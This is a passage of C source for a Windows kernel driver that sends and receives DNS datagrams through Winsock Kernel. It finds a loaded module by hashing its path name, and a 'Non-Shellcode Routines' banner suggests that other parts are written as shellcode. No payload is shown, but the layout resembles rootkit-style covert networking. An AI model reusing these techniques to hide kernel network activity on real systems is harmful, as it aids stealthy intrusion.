		irp,								//IN PIRP  Irp
		(*gd).SendDatagramIRPCompletePtr,	//IN PIO_COMPLETION_ROUTINE  CompletionRoutine
		buff,								//IN PVOID  Context 
		TRUE,								//IN BOOLEAN    InvokeOnSuccess
		TRUE,								//IN BOOLEAN  InvokeOnError
		TRUE								//IN BOOLEAN  InvokeOnCancel
    );
    dispatch = (PWSK_PROVIDER_DATAGRAM_DISPATCH)(*((*socketContext).socket)).Dispatch;
    ntStatus = (*dispatch).WskSendTo
    (
        (*socketContext).socket,        //IN PWSK_SOCKET  Socket
        buff,                           //IN PWSK_BUF  Buffer
        0,                              //IN ULONG  Flags (reserved)
        NULL,                           //IN PSOCKADDR  RemoteAddress OPTIONAL
        0,                              //IN SIZE_T  ControlInfoLength
        NULL,                           //IN PCMSGHDR  ControlInfo OPTIONAL
        irp                             //IN PIRP  Irp
    );
    return(ntStatus);
}/*end sendDatagram()--------------------------------------------------------*/

NTSTATUS recvDatagram(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext, PWSK_BUF buff)
{
    NTSTATUS ntStatus;
    PIRP irp;
    PWSK_PROVIDER_DATAGRAM_DISPATCH dispatch;
    irp = (*gd).ioAllocateIrpPtr(1,FALSE);
	if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
	MyIoSetCompletionRoutine
	(
		irp,								//IN PIRP  Irp
		(*gd).RecvDatagramIRPCompletePtr,	//IN PIO_COMPLETION_ROUTINE  CompletionRoutine
		buff,								//IN PVOID  Context 
		TRUE,								//IN BOOLEAN    InvokeOnSuccess
		TRUE,								//IN BOOLEAN  InvokeOnError
		TRUE								//IN BOOLEAN  InvokeOnCancel
    );
    dispatch = (PWSK_PROVIDER_DATAGRAM_DISPATCH)(*((*socketContext).socket)).Dispatch;
    ntStatus = (*dispatch).WskReceiveFrom 
    (
        (*socketContext).socket,    //IN PWSK_SOCKET  Socket
        buff,                       //IN PWSK_BUF  Buffer
        0,                          //IN ULONG  Flags (reserved)
        NULL,                       //OUT PSOCKADDR  RemoteAddress OPTIONAL
        NULL,                       //IN OUT PULONG  ControlInfoLength OPTIONAL
        NULL,                       //OUT PCMSGHDR  ControlInfo OPTIONAL
        NULL,                       //OUT PULONG  ControlFlags OPTIONAL
        irp                         //IN PIRP  Irp
    );
    return(ntStatus);
}/*end recvDatagram()--------------------------------------------------------*/

NTSTATUS closeDNSSocket(PWSK_APP_SOCKET_CONTEXT socketContext)
{
    NTSTATUS ntStatus;
    PIRP irp;
    PWSK_PROVIDER_BASIC_DISPATCH dispatch;
    irp = IoAllocateIrp(1,FALSE);
    if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
    MyIoSetCompletionRoutine
    (
        irp,                        //IN PIRP  Irp
	    CloseSocketIRPComplete,     //IN PIO_COMPLETION_ROUTINE  CompletionRoutine
	    socketContext,              //IN PVOID  Context 
	    TRUE,                       //IN BOOLEAN    InvokeOnSuccess
	    TRUE,                       //IN BOOLEAN  InvokeOnError
	    TRUE                        //IN BOOLEAN  InvokeOnCancel
    );
    dispatch = (PWSK_PROVIDER_BASIC_DISPATCH)(*((*socketContext).socket)).Dispatch;   
    ntStatus = (*dispatch).WskCloseSocket
    (
        (*socketContext).socket,
        irp
    );
    return(ntStatus);
}/*end closeDNSSocket()------------------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   Non-Shellcode Routines                                                    |
|                                                                             |             
-----------------------------------------------------------------------------*/

void getDriverBaseAddress(DWORD *moduleAddress, DWORD nameHash)
{
	NTSTATUS					ntStatus;
	ULONG						bufferSize;
	AUX_MODULE_EXTENDED_INFO*	modules;
	ULONG						nModules;
	DWORD						i;

	*moduleAddress = 0;
	ntStatus = AuxKlibInitialize();
	if(!NT_SUCCESS(ntStatus)){ return; }
	ntStatus = AuxKlibQueryModuleInformation
	(
		&bufferSize,
		sizeof(AUX_MODULE_EXTENDED_INFO),
		NULL
	);
	if (!NT_SUCCESS(ntStatus) || bufferSize == 0){ return; }
	nModules = bufferSize / sizeof(AUX_MODULE_EXTENDED_INFO);
	modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag
	(
		NonPagedPool,
		bufferSize,
		'BOB'
	);
	if(modules == NULL) 
	{
		ntStatus = STATUS_INSUFFICIENT_RESOURCES;
		return;
    }
	RtlZeroMemory(modules,bufferSize);
	ntStatus = AuxKlibQueryModuleInformation
	(
		&bufferSize,
		sizeof(AUX_MODULE_EXTENDED_INFO),
		modules
	);
	if (!NT_SUCCESS(ntStatus)){ return; }
	for(i=0;i<nModules;i++)
	{
		DWORD routineAddress;
		DWORD hash = 0xFFFFFFFF;
		DWORD baseAddress;

		baseAddress = (DWORD)modules[i].BasicInfo.ImageBase;
		hash = getHashA(modules[i].FullPathName);
		if(hash==nameHash)
		{
			*moduleAddress = baseAddress;
		}
	}
	ExFreePool((PVOID)modules);
    return;
}/*end getDriverBaseAddress()------------------------------------------------*/

void cleanup()
{
	GD *gd;
	NTSTATUS ntStatus;
	gd = (GD*)GlobalDataRoutine();
	IoFreeMdl((*gd).dnsMDL);
    if(((*gd).socketContext).socket!=NULL)
    {
        ntStatus = closeDNSSocket(&((*gd).socketContext));
    }
	WskReleaseProviderNPI(&(((*gd).socketContext).WskRegistration));
	WskDeregister(&(((*gd).socketContext).WskRegistration));
	return;
}/*end cleanup()-------------------------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   Driver-Related Routines                                                   |
|                                                                             |             
-----------------------------------------------------------------------------*/

NTSTATUS defaultDispatch
(
    IN PDEVICE_OBJECT   pDeviceObject,  //pointer to Device Object structure
    IN PIRP             pIRP            //pointer to I/O Request Packet structure
)
{
    ((*pIRP).IoStatus).Status = STATUS_SUCCESS;
    ((*pIRP).IoStatus).Information = 0;
    IoCompleteRequest(pIRP,IO_NO_INCREMENT);
    return(STATUS_SUCCESS);
}/*end defaultDispatch()-----------------------------------------------------*/

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
	cleanup();
	return;
}/*end OnUnload()------------------------------------------------------------*/

NTSTATUS DriverEntry
(
    IN PDRIVER_OBJECT pDriverObject,  
    IN PUNICODE_STRING regPath 
)
{
    DWORD i;
	DWORD hash;
	DWORD baseAddress;
	DoDNSQueriesPtr doDNSQueriesPtr;
	GD *gd;
    for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
    {
        (*pDriverObject).MajorFunction[i] = defaultDispatch;
    }
    (*pDriverObject).DriverUnload = OnUnload;
	hash = 0x6036F862; 
	getDriverBaseAddress(&baseAddress,hash);
	if(baseAddress==0)
	{
		return(STATUS_SUCCESS);
	}
	doDNSQueriesPtr = (DoDNSQueriesPtr)doDNSQueries;
    doDNSQueries(0,baseAddress,(DWORD)doDNSQueriesPtr);
	doDNSQueries(1,baseAddress,(DWORD)doDNSQueriesPtr);
    return(STATUS_SUCCESS);
}/*end DriverEntry()---------------------------------------------------------*/